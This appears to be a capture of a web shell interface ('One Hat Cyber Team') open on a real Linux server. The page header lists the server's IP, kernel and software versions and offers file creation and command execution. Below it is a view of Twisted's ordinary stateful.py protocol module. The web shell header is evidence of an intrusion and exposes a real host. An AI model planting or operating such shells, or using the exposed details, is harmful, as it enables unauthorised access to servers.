⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.31
Server IP:
13.127.59.50
Server:
Linux ip-172-31-46-210 5.15.0-1033-aws #37~20.04.1-Ubuntu SMP Fri Mar 17 11:39:30 UTC 2023 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.3-4ubuntu2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
twisted
/
protocols
/
View File Name :
stateful.py
# -*- test-case-name: twisted.test.test_stateful -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

from twisted.internet import protocol

from io import BytesIO


class StatefulProtocol(protocol.Protocol):
    """
    A Protocol that keeps track of parsing state on your behalf.

    A state is a pair ``(function, num_bytes)``.  Once ``num_bytes`` bytes
    have arrived from the network, ``function`` is called with exactly those
    bytes.  Whatever it returns becomes the next state; a false value such as
    ``None`` keeps the current state.  The initial state is supplied by
    ``getInitialState``, which subclasses must override.
    """

    # (current state, receive buffer, read offset into the buffer)
    _sful_data = None, None, 0

    def makeConnection(self, transport):
        """
        Run the base class connection setup, then install the initial state
        together with an empty receive buffer and a zero read offset.
        """
        protocol.Protocol.makeConnection(self, transport)
        self._sful_data = self.getInitialState(), BytesIO(), 0

    def getInitialState(self):
        """
        Return the initial ``(function, num_bytes)`` state.

        The default implementation raises NotImplementedError; subclasses
        must override it.
        """
        raise NotImplementedError

    def dataReceived(self, data):
        """
        Buffer ``data`` and fire the current state's function for every
        complete chunk of ``num_bytes`` bytes now available.
        """
        current, pending, consumed = self._sful_data

        # Append the new bytes at the end of the buffer, note the total
        # number of buffered bytes, then rewind to the first unread byte.
        pending.seek(0, 2)
        pending.write(data)
        total = pending.tell()
        pending.seek(consumed)

        while True:
            needed = current[1]
            if total - consumed < needed:
                # Not enough unread bytes for the current state yet.
                break
            chunk = pending.read(needed)
            consumed += needed
            successor = current[0](chunk)
            if self.transport.disconnecting:
                # XXX: hack borrowed straight from LineReceiver.
                # dataReceived won't be called again, so leaving the stored
                # state inconsistent does not matter.
                return
            if successor:
                current = successor

        if consumed:
            # Drop the bytes already handed out so the buffer holds only the
            # unread remainder, starting at position zero.
            leftover = pending.read()
            pending.seek(0)
            pending.truncate()
            pending.write(leftover)
            consumed = 0

        self._sful_data = current, pending, consumed